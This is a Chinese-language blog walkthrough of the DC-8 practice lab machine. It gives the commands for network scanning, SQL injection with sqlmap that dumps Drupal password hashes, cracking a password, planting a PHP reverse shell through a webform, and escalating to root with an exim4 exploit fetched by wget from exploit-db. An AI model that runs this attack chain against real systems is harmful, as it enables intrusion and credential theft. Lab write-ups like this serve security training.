DC8-靶机

下载地址

 

配置的环境:

kali:192.168.25.131         DC8-靶机 和 kali 在同一C段

 

渗透

nmap扫描网段,发现存活主机

nmap -sP 192.168.25.0/24

 

发现主机 192.168.25.129,判定为DC8-靶机,继续使用nmap获取详细信息

nmap -A -p 1-65535 192.168.25.129

 

开启了ssh,访问靶机ip得知,为Drupal CMS

 

访问站点,发现注入点,存在报错注入~

 

sqlmap启动

sqlmap -u http://192.168.25.129/?nid=1%27 --dbs

 

sqlmap -u http://192.168.25.129/?nid=1%27 -D d7db --tables

 

sqlmap -u http://192.168.25.129/?nid=2  -D d7db -T users --columns

 

sqlmap -u http://192.168.25.129/?nid=2  -D d7db -T users -C "uid,name,pass" --dump

admin   $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

 

得到账号和密码的hash,爆破hash 使用john工具(作者站点账户为john,提示~)

用法: john 密码文件

将john的hash放入密码文件中,开始爆破

 

得到密码  turtle,找后台登录

dirsearch扫描登录目录,扫到/user,登录

 

参考DC-7靶机后台拿shell,依旧是写入PHP文件反弹,

点击上面的Contact,选择Contact Us,后点击Webform -> form settings,选择PHP code,然后填入DC-7靶机用的反弹脚本

 

nc监听,回到Contact us主页面,随意填写基本内容,然后提交

.

 

成功得到一个交互式的shell

python -c "import pty;pty.spawn('/bin/bash')"

 

看看哪些命令是root权限

find / -perm -4000 2>/dev/null

 

发现exim4 查看对应版本信息

 

利用exim4提权,提权需要有写权限,www-data用户在当前目录下无写权限,所以切换到有写权限的/tmp目录下

 

在靶机上下载提权的exp

wget https://www.exploit-db.com/download/46996

 

脚本需要编辑,因为在本地,可以互通,也本地起一个apache服务,将下载脚本放到kali上,靶机在去kali上下载

 

 

 

提权到root!

执行脚本,报错~

 

搜索发现这个报错是由于windows下编辑上传到linux下执行导致的

本地编辑查看文件类型  :set ff?,会出现 dos或unix格式,如果为dos,需要改为unix模式

 

使用 :set ff=unix 修改文件格式 强制为unix格式,并保存退出

 

重新下载,执行(脚本建议使用高端口,我用的是默认的)

 

 

成功!

 

 

 

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值